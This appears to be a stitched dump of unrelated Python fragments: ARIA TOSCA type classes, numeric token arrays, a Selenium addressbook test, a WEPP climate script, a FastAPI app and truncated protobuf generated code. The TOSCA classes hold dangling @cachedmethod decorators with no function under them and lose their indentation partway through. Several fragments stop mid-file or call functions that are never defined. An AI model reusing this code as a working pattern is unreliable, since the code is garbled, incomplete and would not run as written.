    /TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
    #DEFN_ENTITY_RELATIONSHIP_TYPE>`__
    """
    @field_validator(derived_from_validator(convert_name_to_full_type_name, 'relationship_types'))
    @primitive_field(str)
    def derived_from(self):
        """
        An optional parent Relationship Type name the Relationship Type derives from.
        :type: :obj:`basestring`
        """
    @field_getter(data_type_class_getter(Version))
    @primitive_field(str)
    def version(self):
        """
        An optional version for the Relationship Type definition.
        :type: :class:`Version`
        """
    @object_field(Description)
    def description(self):
        """
        An optional description for the Relationship Type.
        :type: :class:`Description`
        """
    @object_dict_field(PropertyDefinition)
    def properties(self):
        """
        An optional list of property definitions for the Relationship Type.
        :type: {:obj:`basestring`: :class:`PropertyDefinition`}
        """
    @object_dict_field(AttributeDefinition)
    def attributes(self):
        """
        An optional list of attribute definitions for the Relationship Type.
        :type: {:obj:`basestring`: :class:`AttributeDefinition`}
        """
    @object_dict_field(InterfaceDefinition)
    def interfaces(self):
        """
        An optional list of interface definitions interfaces supported by the Relationship Type.
        :type: {:obj:`basestring`: :class:`InterfaceDefinition`}
        """
    @field_validator(list_type_validator('capability type', convert_name_to_full_type_name,
                                         'capability_types'))
    @primitive_list_field(str)
    def valid_target_types(self):
        """
        An optional list of one or more names of Capability Types that are valid targets for this
        relationship.
        :type: [:obj:`basestring`]
        """
    # NOTE(review): _is_descendant carries two stacked @cachedmethod
    # decorators — the first likely belonged to a stripped method; confirm
    # against upstream ARIA.
    @cachedmethod
    @cachedmethod
    def _is_descendant(self, context, the_type):
        """
        Checks if ``the_type`` is our descendant (or equal to us).
        """
        # Walk up the derived_from chain until we hit ourselves or the root.
        if the_type is None:
            return False
        elif the_type._name == self._name:
            return True
        return self._is_descendant(context, the_type._get_parent(context))
    # NOTE(review): the following @cachedmethod decorators are not followed
    # by function definitions — the decorated methods appear to have been
    # stripped; restore them from upstream ARIA before use.
    @cachedmethod
    @cachedmethod
    @cachedmethod
@has_fields
@implements_specification('3.6.8', 'tosca-simple-1.0')
class NodeType(ExtensiblePresentation):
    """
    A Node Type is a reusable entity that defines the type of one or more Node Templates. As such, a
    Node Type defines the structure of observable properties via a Properties Definition, the
    Requirements and Capabilities of the node as well as its supported interfaces.
    See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
    /TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
    #DEFN_ENTITY_NODE_TYPE>`__
    """
    @field_validator(derived_from_validator(convert_name_to_full_type_name, 'node_types'))
    @primitive_field(str)
    def derived_from(self):
        """
        An optional parent Node Type name this new Node Type derives from.
        :type: :obj:`basestring`
        """
    @field_getter(data_type_class_getter(Version))
    @primitive_field(str)
    def version(self):
        """
        An optional version for the Node Type definition.
        :type: :class:`Version`
        """
    @object_field(Description)
    def description(self):
        """
        An optional description for the Node Type.
        :type: :class:`Description`
        """
    @object_dict_field(PropertyDefinition)
    def properties(self):
        """
        An optional list of property definitions for the Node Type.
        :type: {:obj:`basestring`: :class:`PropertyDefinition`}
        """
    @object_dict_field(AttributeDefinition)
    def attributes(self):
        """
        An optional list of attribute definitions for the Node Type.
        :type: {:obj:`basestring`: :class:`AttributeDefinition`}
        """
    @object_sequenced_list_field(RequirementDefinition)
    def requirements(self):
        """
        An optional sequenced list of requirement definitions for the Node Type.
        ARIA NOTE: The spec seems wrong to make this a sequenced list. It seems that when you have
        more than one requirement of the same name, behavior is undefined. The idea is to use the
        "occurrences" field if you need to limit the number of requirement assignments.
        :type: list of (str, :class:`RequirementDefinition`)
        """
    @object_dict_field(CapabilityDefinition)
    def capabilities(self):
        """
        An optional list of capability definitions for the Node Type.
        :type: list of :class:`CapabilityDefinition`
        """
    @object_dict_field(InterfaceDefinition)
    def interfaces(self):
        """
        An optional list of interface definitions supported by the Node Type.
        :type: {:obj:`basestring`: :class:`InterfaceDefinition`}
        """
    @object_dict_field(ArtifactAssignmentForType)
    def artifacts(self):
        """
        An optional list of named artifact definitions for the Node Type.
        :type: {:obj:`basestring`: :class:`ArtifactAssignmentForType`}
        """
    # NOTE(review): _is_descendant carries two stacked @cachedmethod
    # decorators — the first likely belonged to a stripped method; confirm
    # against upstream ARIA.
    @cachedmethod
    @cachedmethod
    def _is_descendant(self, context, the_type):
        """
        Checks if ``the_type`` is our descendant (or equal to us).
        """
        # Walk up the derived_from chain until we hit ourselves or the root.
        if the_type is None:
            return False
        elif the_type._name == self._name:
            return True
        return self._is_descendant(context, the_type._get_parent(context))
    # NOTE(review): the following @cachedmethod decorators are not followed
    # by function definitions — the decorated methods appear to have been
    # stripped; restore them from upstream ARIA before use.
    @cachedmethod
    @cachedmethod
    @cachedmethod
    @cachedmethod
    @cachedmethod
    @cachedmethod
@has_fields
@implements_specification('3.6.10', 'tosca-simple-1.0')
class GroupType(ExtensiblePresentation):
    """
    A Group Type defines logical grouping types for nodes, typically for different management
    purposes. Groups can effectively be viewed as logical nodes that are not part of the physical
    deployment topology of an application, yet can have capabilities and the ability to attach
    policies and interfaces that can be applied (depending on the group type) to its member nodes.
    Conceptually, group definitions allow the creation of logical "membership" relationships to
    nodes in a service template that are not a part of the application's explicit requirement
    dependencies in the topology template (i.e. those required to actually get the application
    deployed and running). Instead, such logical membership allows for the introduction of things
    such as group management and uniform application of policies (i.e., requirements that are also
    not bound to the application itself) to the group's members.
    See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
    /TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
    #DEFN_ENTITY_GROUP_TYPE>`__
    """
    @field_validator(derived_from_validator(convert_name_to_full_type_name, 'group_types'))
    @primitive_field(str)
    def derived_from(self):
        """
        An optional parent Group Type name the Group Type derives from.
        :type: :obj:`basestring`
        """
    @field_getter(data_type_class_getter(Version))
    @primitive_field(str)
    def version(self):
        """
        An optional version for the Group Type definition.
        :type: :class:`Version`
        """
    @object_field(Description)
    def description(self):
        """
        The optional description for the Group Type.
        :type: :class:`Description`
        """
    @object_dict_field(PropertyDefinition)
    def properties(self):
        """
        An optional list of property definitions for the Group Type.
        :type: {:obj:`basestring`: :class:`PropertyDefinition`}
        """
    @field_validator(list_type_validator('node type', convert_name_to_full_type_name, 'node_types'))
    @primitive_list_field(str)
    def members(self):
        """
        An optional list of one or more names of Node Types that are valid (allowed) as members of
        the Group Type.
        Note: This can be viewed by TOSCA Orchestrators as an implied relationship from the listed
        members nodes to the group, but one that does not have operational lifecycle considerations.
        For example, if we were to name this as an explicit Relationship Type we might call this
        "MemberOf" (group).
        :type: [:obj:`basestring`]
        """
    @object_dict_field(InterfaceDefinition)
    def interfaces(self):
        """
        An optional list of interface definitions supported by the Group Type.
        :type: {:obj:`basestring`: :class:`InterfaceDefinition`}
        """
    # NOTE(review): _is_descendant carries two stacked @cachedmethod
    # decorators — the first likely belonged to a stripped method; confirm
    # against upstream ARIA.
    @cachedmethod
    @cachedmethod
    def _is_descendant(self, context, the_type):
        """
        Checks if ``the_type`` is our descendant (or equal to us).
        """
        # Walk up the derived_from chain until we hit ourselves or the root.
        if the_type is None:
            return False
        elif the_type._name == self._name:
            return True
        return self._is_descendant(context, the_type._get_parent(context))
    # NOTE(review): the following @cachedmethod decorators are not followed
    # by function definitions — the decorated methods appear to have been
    # stripped; restore them from upstream ARIA before use.
    @cachedmethod
    @cachedmethod
    @cachedmethod
@has_fields
@implements_specification('3.6.11', 'tosca-simple-1.0')
class PolicyType(ExtensiblePresentation):
"""
A Policy Type defines a type of requirement that affects or governs an application or service's
topology at some stage of its lifecycle, but is not explicitly part of the topology itself
(i.e., it does not prevent the application or service from being deployed or run if it did not
exist).
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_POLICY_TYPE>`__
"""
@field_validator(derived_from_validator(convert_name_to_full_type_name, 'policy_types'))
@primitive_field(str)
def derived_from(self):
"""
An optional parent Policy Type name the Policy Type derives from.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Policy Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
The optional description for the Policy Type.
:type: :class:`Description`
"""
@object_dict_field(PropertyDefinition)
def properties(self):
"""
An optional list of property definitions for the Policy Type.
:type: :class:`PropertyDefinition`
"""
@field_validator(list_node_type_or_group_type_validator)
@primitive_list_field(str)
def targets(self):
"""
An optional list of valid Node Types or Group Types the Policy Type can be applied to.
Note: This can be viewed by TOSCA Orchestrators as an implied relationship to the target
nodes, but one that does not have operational lifecycle considerations. For example, if we
were to name this as an explicit Relationship Type we might call this "AppliesTo" (node or
group).
:type: [:obj:`basestring`]
"""
@cachedmethod
@cachedmethod
@cachedmethod
| [
2,
49962,
284,
262,
24843,
10442,
5693,
357,
1921,
37,
8,
739,
530,
393,
517,
198,
2,
18920,
5964,
11704,
13,
220,
4091,
262,
28536,
2393,
9387,
351,
198,
2,
428,
670,
329,
3224,
1321,
5115,
6634,
9238,
13,
198,
2,
383,
7054,
37,
... | 2.603866 | 8,795 |
import unittest
from com.example.client.config.low_level_client_by_connection import ESLowLevelClientByConnection
from elasticsearch_dsl import Search
from elasticsearch_dsl.query import Q, MatchPhrase
| [
11748,
555,
715,
395,
198,
6738,
401,
13,
20688,
13,
16366,
13,
11250,
13,
9319,
62,
5715,
62,
16366,
62,
1525,
62,
38659,
1330,
34084,
322,
4971,
11792,
3886,
32048,
198,
6738,
27468,
12947,
62,
67,
6649,
1330,
11140,
198,
6738,
2746... | 3.642857 | 56 |
# -*- coding: utf-8 -*-
from selenium.webdriver.firefox.webdriver import WebDriver
from selenium.webdriver.common.action_chains import ActionChains
import time
success = True
wd = WebDriver()
wd.implicitly_wait(60)
try:
wd.get("http://localhost/addressbook/")
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys("secret")
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys("admin")
wd.find_element_by_css_selector("input[type=\"submit\"]").click()
wd.find_element_by_link_text("groups").click()
wd.find_element_by_name("new").click()
wd.find_element_by_name("group_name").click()
wd.find_element_by_name("group_name").clear()
wd.find_element_by_name("group_name").send_keys("new froup")
wd.find_element_by_name("group_header").click()
wd.find_element_by_name("group_header").clear()
wd.find_element_by_name("group_header").send_keys("new grope")
wd.find_element_by_name("group_footer").click()
wd.find_element_by_name("group_footer").clear()
wd.find_element_by_name("group_footer").send_keys("new grpi")
wd.find_element_by_name("submit").click()
wd.find_element_by_link_text("group page").click()
wd.find_element_by_link_text("Logout").click()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").send_keys("\\undefined")
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").send_keys("\\undefined")
finally:
wd.quit()
if not success:
raise Exception("Test failed.")
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
6495,
12792,
13,
12384,
26230,
1330,
5313,
32103,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11321,
13,
2673,
62,
3... | 2.449339 | 681 |
# coding: utf-8
import unittest
import charset_normalizer.utils as unicode_utils
if __name__ == '__main__':
unittest.main()
| [
2,
19617,
25,
3384,
69,
12,
23,
201,
198,
11748,
555,
715,
395,
201,
198,
11748,
34534,
316,
62,
11265,
7509,
13,
26791,
355,
28000,
1098,
62,
26791,
201,
198,
201,
198,
201,
198,
201,
198,
361,
11593,
3672,
834,
6624,
705,
834,
1... | 2.355932 | 59 |
# Python imports
import cliFile
import mx.DateTime
import pg
import sys
import editclifile
import cliRecord
import numpy
# Connect to the WEPP database
mydb = pg.connect('wepp', 'iemdb', user='wepp')
# We call with args for the time we are interested in
if (len(sys.argv) == 4):
yyyy, mm, dd = int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])
ts = mx.DateTime.DateTime(yyyy, mm, dd)
insertJobQueue = 0
elif len(sys.argv) == 2:
ts = mx.DateTime.now() + mx.DateTime.RelativeDateTime(days=-1, hour=0, minute=0)
insertJobQueue = 0
else:
ts = mx.DateTime.now() + mx.DateTime.RelativeDateTime(days=-1, hour=0, minute=0)
insertJobQueue = 1
# Globals
times = [0]*96
points = 23182
data = [0]*points
for i in range(points):
data[i] = [0]*96
cl = {}
clh = {}
#
main()
| [
2,
11361,
17944,
198,
11748,
537,
72,
8979,
198,
11748,
285,
87,
13,
10430,
7575,
198,
11748,
23241,
198,
11748,
25064,
198,
11748,
4370,
565,
361,
576,
198,
11748,
537,
72,
23739,
198,
11748,
299,
32152,
198,
198,
2,
8113,
284,
262,
... | 2.417445 | 321 |
from fastapi import FastAPI
from starlette.middleware.cors import CORSMiddleware
from toponym_api.api.api_v1.api import router as api_router
from toponym_api.core.config import ALLOWED_HOSTS, API_V1_STR, PROJECT_NAME
from mangum import Mangum
app = FastAPI(
title=PROJECT_NAME,
# if not custom domain
# openapi_prefix="/Prod"
)
app.add_middleware(
CORSMiddleware,
allow_origins=ALLOWED_HOSTS,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(api_router, prefix=API_V1_STR)
@app.get("/ping")
def pong():
"""
Sanity check.
This will let the user know that the service is operational.
And this path operation will:
* show a lifesign
"""
return {"ping": "pong!"}
handler = Mangum(app, enable_lifespan=False)
| [
6738,
3049,
15042,
1330,
12549,
17614,
198,
6738,
3491,
21348,
13,
27171,
1574,
13,
66,
669,
1330,
23929,
12310,
2509,
1574,
198,
6738,
1353,
5177,
62,
15042,
13,
15042,
13,
15042,
62,
85,
16,
13,
15042,
1330,
20264,
355,
40391,
62,
4... | 2.56962 | 316 |
from node import Node
from assembly import Assembly
| [
6738,
10139,
1330,
19081,
201,
198,
6738,
10474,
1330,
10006,
201,
198,
201,
198,
201,
198
] | 3.625 | 16 |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: create.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from easy_flow_sdk.model.easy_flow import deploy_label_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__label__pb2
from easy_flow_sdk.model.easy_flow import deploy_target_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__target__pb2
from easy_flow_sdk.model.cmdb import cluster_info_pb2 as easy__flow__sdk_dot_model_dot_cmdb_dot_cluster__info__pb2
from easy_flow_sdk.model.easy_flow import version_info_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2
from easy_flow_sdk.model.easy_flow import target_info_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_target__info__pb2
from easy_flow_sdk.model.easy_flow import package_info_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_package__info__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='create.proto',
package='deploy',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x0c\x63reate.proto\x12\x06\x64\x65ploy\x1a\x30\x65\x61sy_flow_sdk/model/easy_flow/deploy_label.proto\x1a\x31\x65\x61sy_flow_sdk/model/easy_flow/deploy_target.proto\x1a+easy_flow_sdk/model/cmdb/cluster_info.proto\x1a\x30\x65\x61sy_flow_sdk/model/easy_flow/version_info.proto\x1a/easy_flow_sdk/model/easy_flow/target_info.proto\x1a\x30\x65\x61sy_flow_sdk/model/easy_flow/package_info.proto\"\x93\x0c\n\rCreateRequest\x12\x12\n\nneedNotify\x18\x01 \x01(\x08\x12&\n\x06labels\x18\x02 \x01(\x0b\x32\x16.easy_flow.DeployLabel\x12\r\n\x05\x61ppId\x18\x03 \x01(\t\x12\x0f\n\x07\x61ppName\x18\x04 \x01(\t\x12\x11\n\tclusterId\x18\x05 \x01(\t\x12\x13\n\x0b\x63lusterType\x18\x06 \x01(\t\x12\x10\n\x08\x62\x61tchNum\x18\x07 \x01(\x05\x12\x15\n\rbatchInterval\x18\x08 \x01(\x05\x12.\n\x07\x62\x61tches\x18\t \x03(\x0b\x32\x1d.deploy.CreateRequest.Batches\x12\x12\n\nfailedStop\x18\n \x01(\x08\x12\x10\n\x08targetId\x18\x0b \x01(\t\x12\x12\n\ntargetName\x18\x0c \x01(\t\x12\x12\n\ninstanceId\x18\r \x01(\t\x12\"\n\x07\x63luster\x18\x0e \x01(\x0b\x32\x11.cmdb.ClusterInfo\x12\x38\n\x0cinstanceInfo\x18\x0f \x03(\x0b\x32\".deploy.CreateRequest.InstanceInfo\x12:\n\roperationInfo\x18\x10 \x03(\x0b\x32#.deploy.CreateRequest.OperationInfo\x12)\n\ntargetList\x18\x11 \x03(\x0b\x32\x15.easy_flow.TargetInfo\x12+\n\x0bpackageList\x18\x12 \x03(\x0b\x32\x16.easy_flow.PackageInfo\x12\x34\n\nconfigList\x18\x13 \x03(\x0b\x32 .deploy.CreateRequest.ConfigList\x12\x17\n\x0f\x63onfigPackageId\x18\x14 \x01(\t\x12\x34\n\nconfigDiff\x18\x15 \x03(\x0b\x32 .deploy.CreateRequest.ConfigDiff\x1a\x33\n\x07\x42\x61tches\x12(\n\x07targets\x18\x01 \x03(\x0b\x32\x17.easy_flow.DeployTarget\x1a\x8b\x01\n\x0cInstanceInfo\x12\x13\n\x0bversionName\x18\x01 \x01(\t\x12+\n\x0bversionInfo\x18\x02 \x01(\x0b\x32\x16.easy_flow.VersionInfo\x12\x11\n\tpackageId\x18\x03 \x01(\t\x12\x13\n\x0binstallPath\x18\x04 \x01(\t\x12\x11\n\tversionId\x18\x05 \x01(\t\x1a\xaa\x01\n\rOperationInfo\x12\x11\n\toperation\x18\x01 
\x01(\t\x12-\n\rversionToInfo\x18\x02 \x01(\x0b\x32\x16.easy_flow.VersionInfo\x12/\n\x0fversionFromInfo\x18\x03 \x01(\x0b\x32\x16.easy_flow.VersionInfo\x12\x13\n\x0binstallPath\x18\x04 \x01(\t\x12\x11\n\tpackageId\x18\x05 \x01(\t\x1a\xee\x01\n\nConfigList\x12\r\n\x05hosts\x18\x01 \x03(\t\x12\x39\n\x07\x63onfigs\x18\x02 \x03(\x0b\x32(.deploy.CreateRequest.ConfigList.Configs\x1a\x95\x01\n\x07\x43onfigs\x12\x11\n\tpackageId\x18\x01 \x01(\t\x12=\n\x05items\x18\x02 \x03(\x0b\x32..deploy.CreateRequest.ConfigList.Configs.Items\x12\x13\n\x0binstallPath\x18\x03 \x01(\t\x1a#\n\x05Items\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0c\n\x04path\x18\x02 \x01(\t\x1a\xfe\x01\n\nConfigDiff\x12\r\n\x05hosts\x18\x01 \x03(\t\x12\x37\n\x06\x64\x65tail\x18\x02 \x03(\x0b\x32\'.deploy.CreateRequest.ConfigDiff.Detail\x1a\xa7\x01\n\x06\x44\x65tail\x12<\n\x05items\x18\x01 \x03(\x0b\x32-.deploy.CreateRequest.ConfigDiff.Detail.Items\x12\x11\n\tpackageId\x18\x02 \x01(\t\x12\x13\n\x0binstallPath\x18\x03 \x01(\t\x1a\x37\n\x05Items\x12\x0c\n\x04path\x18\x01 \x01(\t\x12\x0f\n\x07newName\x18\x02 \x01(\t\x12\x0f\n\x07oldName\x18\x03 \x01(\t\"n\n\x0e\x43reateResponse\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x0b\n\x03msg\x18\x02 \x01(\t\x12)\n\x04\x64\x61ta\x18\x03 \x01(\x0b\x32\x1b.deploy.CreateResponse.Data\x1a\x16\n\x04\x44\x61ta\x12\x0e\n\x06taskId\x18\x01 \x01(\t\"o\n\x15\x43reateResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12$\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32\x16.deploy.CreateResponseb\x06proto3')
,
dependencies=[easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__label__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__target__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_cmdb_dot_cluster__info__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_easy__flow_dot_target__info__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_easy__flow_dot_package__info__pb2.DESCRIPTOR,])
_CREATEREQUEST_BATCHES = _descriptor.Descriptor(
name='Batches',
full_name='deploy.CreateRequest.Batches',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='targets', full_name='deploy.CreateRequest.Batches.targets', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1011,
serialized_end=1062,
)
_CREATEREQUEST_INSTANCEINFO = _descriptor.Descriptor(
name='InstanceInfo',
full_name='deploy.CreateRequest.InstanceInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='versionName', full_name='deploy.CreateRequest.InstanceInfo.versionName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionInfo', full_name='deploy.CreateRequest.InstanceInfo.versionInfo', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='deploy.CreateRequest.InstanceInfo.packageId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='deploy.CreateRequest.InstanceInfo.installPath', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionId', full_name='deploy.CreateRequest.InstanceInfo.versionId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1065,
serialized_end=1204,
)
_CREATEREQUEST_OPERATIONINFO = _descriptor.Descriptor(
name='OperationInfo',
full_name='deploy.CreateRequest.OperationInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='operation', full_name='deploy.CreateRequest.OperationInfo.operation', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionToInfo', full_name='deploy.CreateRequest.OperationInfo.versionToInfo', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionFromInfo', full_name='deploy.CreateRequest.OperationInfo.versionFromInfo', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='deploy.CreateRequest.OperationInfo.installPath', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='deploy.CreateRequest.OperationInfo.packageId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1207,
serialized_end=1377,
)
_CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS = _descriptor.Descriptor(
name='Items',
full_name='deploy.CreateRequest.ConfigList.Configs.Items',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='deploy.CreateRequest.ConfigList.Configs.Items.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='path', full_name='deploy.CreateRequest.ConfigList.Configs.Items.path', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1583,
serialized_end=1618,
)
_CREATEREQUEST_CONFIGLIST_CONFIGS = _descriptor.Descriptor(
name='Configs',
full_name='deploy.CreateRequest.ConfigList.Configs',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='packageId', full_name='deploy.CreateRequest.ConfigList.Configs.packageId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='items', full_name='deploy.CreateRequest.ConfigList.Configs.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='deploy.CreateRequest.ConfigList.Configs.installPath', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1469,
serialized_end=1618,
)
_CREATEREQUEST_CONFIGLIST = _descriptor.Descriptor(
name='ConfigList',
full_name='deploy.CreateRequest.ConfigList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='hosts', full_name='deploy.CreateRequest.ConfigList.hosts', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='configs', full_name='deploy.CreateRequest.ConfigList.configs', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_CONFIGLIST_CONFIGS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1380,
serialized_end=1618,
)
_CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS = _descriptor.Descriptor(
name='Items',
full_name='deploy.CreateRequest.ConfigDiff.Detail.Items',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='path', full_name='deploy.CreateRequest.ConfigDiff.Detail.Items.path', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='newName', full_name='deploy.CreateRequest.ConfigDiff.Detail.Items.newName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
